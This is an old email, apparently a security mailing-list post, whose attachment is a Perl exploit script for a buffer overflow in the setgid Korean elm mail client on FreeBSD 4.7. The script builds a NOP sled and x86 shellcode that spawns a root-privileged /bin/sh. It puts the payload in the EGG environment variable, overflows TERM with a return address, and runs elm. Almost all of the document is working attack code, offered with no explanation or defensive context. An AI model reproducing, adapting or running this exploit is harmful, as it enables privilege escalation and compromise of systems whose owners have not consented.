------=_NextPart_000_00C6_01C339C3.68791EC0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Sorry, no pretty describing document this time.

--
kokanin
------=_NextPart_000_00C6_01C339C3.68791EC0
Content-Type: application/octet-stream;
	name="DSR-korean-elm.pl---txt.poo.av.is.gay"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="DSR-korean-elm.pl---txt.poo.av.is.gay"

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, =
http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin'=20

$len =3D 512;
$ret =3D 0xbfbffd68;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D 	"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
		"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
		"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
             =20
if (@ARGV =3D=3D 1) {
    $offset =3D $ARGV[0];
}
 =20
for ($i =3D 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .=3D $nop;
}
$buffer .=3D $shellcode;
$new_ret =3D pack('l', ($ret + $offset));
local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'TERM'}) =3D $new_ret x 12;=20
exec("elm");
------=_NextPart_000_00C6_01C339C3.68791EC0--